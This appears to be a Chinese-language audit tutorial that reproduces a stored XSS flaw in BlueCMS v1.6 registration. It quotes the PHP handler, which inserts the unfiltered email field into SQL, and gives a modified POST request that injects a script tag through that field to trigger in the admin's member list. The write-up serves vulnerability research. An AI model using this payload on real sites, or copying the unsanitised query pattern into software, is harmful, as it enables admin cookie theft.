代码审计：bluecms 用户注册xss漏洞复现

bluecms

BlueCMS是一款专注于地方门户网站建设解决方案，基于PHP+MySQL的技术开发，全部源码开放。
复现版本为bluecmsv1.6版本，各位可自行下载。

代码审计

这次不用Seay挖xss漏洞，我们通过关键功能测试来审计xss漏洞。
在后台->会员管理->会员列表处，管理员是可以查看会员信息的，要是此处信息能从前台插入xss代码，就能盗取管理员cookie。

来到前台会员注册处，尝试注册一个用户，可以看到可控的有用户名，邮箱，密码一般不考虑。

提交注册，抓包具体分析一下，可以看到走的是user.php的do_reg方法。

来到代码所在处，可以看到用户名有长度限制，邮箱没有过滤直接插入sql语句，那应该邮箱处可以插入我们的xss代码。

elseif($act == 'do_reg'){
	$user_name 		=	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
	$pwd       		= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
	$pwd1 	   		= 	!empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
	$email     		= 	!empty($_POST['email']) ? trim($_POST['email']) : '';
	$safecode  		= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
	$from = !empty($from) ? base64_decode($from) : 'user.php';

	if(strlen($user_name) < 4 || strlen($user_name) > 16){
		showmsg('用户名字符长度不符');
	}
	if(strlen($pwd) < 6){
		showmsg('密码不能少于6个字符');
	}
	if($pwd != $pwd1){
		showmsg('两次输入密码不一致');
	}
	if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
		showmsg('验证码错误');
	}
	if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
	if(!$db->query($sql)){
		showmsg('很遗憾，注册中出错啦');
	}else{
		$_SESSION['user_id'] = $db->insert_id();
		$_SESSION['user_name'] = $user_name;
		update_user_info($_SESSION['user_name']);
		setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
		if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
		{
		$uid = uc_user_register($user_name, $pwd, $email);
		if($uid <= 0)
		{
			if($uid == -1)
			{
				showmsg('用户名不合法！');
			}
			elseif($uid == -2)
			{
				showmsg('包含不允许注册的词语！');
			}
			elseif($uid == -3)
			{
				showmsg('你指定的用户名 '.$user_name.' 已存在，请使用别的用户名！');
			}
			elseif($uid == -4){
				showmsg('您使用的Email格式不对！');
			}
			elseif($uid == -5)
			{
				showmsg('你使用的Email 不允许注册！');
			}
			else
			{
				showmsg('注册失败！');
			}
		}
		else
		{
			$ucsynlogin = uc_user_synlogin($uid);
			echo $ucsynlogin;
		}
		}
		$_SESSION['last_reg'] = $timestamp;
		showmsg('恭喜您注册成功,现在将转向...', $from);
	}
 }

漏洞复现

前端有js验证邮箱合法性，那我们输入正确的邮箱地址，抓包进行修改。

referer=&user_name=xss123&pwd=123456&pwd1=123456&email=haha%40qq.com<script>alert(1)</script>&safecode=rc4d&from=&act=do_reg

可以看到注册成功，登录xss123用户，直接弹窗。

以管理员登录后台，查看会员列表，也成功弹窗，xss代码也确实插入成功。